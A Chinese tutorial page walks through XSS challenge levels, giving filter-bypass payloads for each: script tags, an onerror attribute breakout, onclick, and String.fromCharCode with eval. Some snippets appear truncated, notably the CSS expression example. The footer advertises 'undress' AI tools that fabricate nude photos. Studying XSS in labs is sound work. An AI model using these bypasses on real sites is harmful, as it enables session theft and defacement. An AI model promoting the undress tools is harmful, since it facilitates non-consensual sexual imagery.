无安全方面的限制,直接使用
<script>alert(/xss/);</script>
限制条件:只能使用CSS,不允许使用html标签
我们知道利用expression可以用来构造XSS,但是只能在IE下面测试,所以下面的测试请在IE6中执行。
body {
black;
xss:alert(/xss/));/*IE6下测试*/
}
限制条件:对HTML进行了转义,Image标签可用。
测试输入的字符会被插入到src地址中,那么可以使用伪协议来绕过。
直接输入
alert( /xss/);
或者你也可以使用事件来绕过,注意闭合语句即可,如下:
1" onerror=alert(/xss/); var a="1
限制条件:使用了关键字过滤。
我测试了一下,大部分都过滤了,有部分未过滤,经测试script/onerror过滤了,但是onclick未过滤,使用onclick事件绕过
<img src=# onclick=alert(/xss/);>
限制条件:使用addslashes对特征字符进行了转义
也就是说我们的XSS语句中不能出现单引号,双引号等等特征字符。
直接使用
<script>alert(/xss/);</script>
即可绕过
或者使用String.fromCharCode方法,如下:
<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>
以上是xss的小测试是怎样进行的的详细内容。更多信息请关注PHP中文网其他相关文章!
热AI工具
Undresser.AI Undress
人工智能驱动的应用程序,用于创建逼真的裸体照片
AI Clothes Remover
用于从照片中去除衣服的在线人工智能工具。
Undress AI Tool
免费脱衣服图片
Clothoff.io
AI脱衣机
AI Hentai Generator
免费生成ai无尽的。
热门文章
热工具
安全考试浏览器
Safe Exam Browser是一个安全的浏览器环境,用于安全地进行在线考试。该软件将任何计算机变成一个安全的工作站。它控制对任何实用工具的访问,并防止学生使用未经授权的资源。
螳螂BT
Mantis是一个易于部署的基于Web的缺陷跟踪工具,用于帮助产品缺陷跟踪。它需要PHP、MySQL和一个Web服务器。请查看我们的演示和托管服务。
适用于 Eclipse 的 SAP NetWeaver 服务器适配器
将Eclipse与SAP NetWeaver应用服务器集成。
SublimeText3 英文版
推荐:为Win版本,支持代码提示!
SublimeText3 Mac版
神级代码编辑软件(SublimeText3)
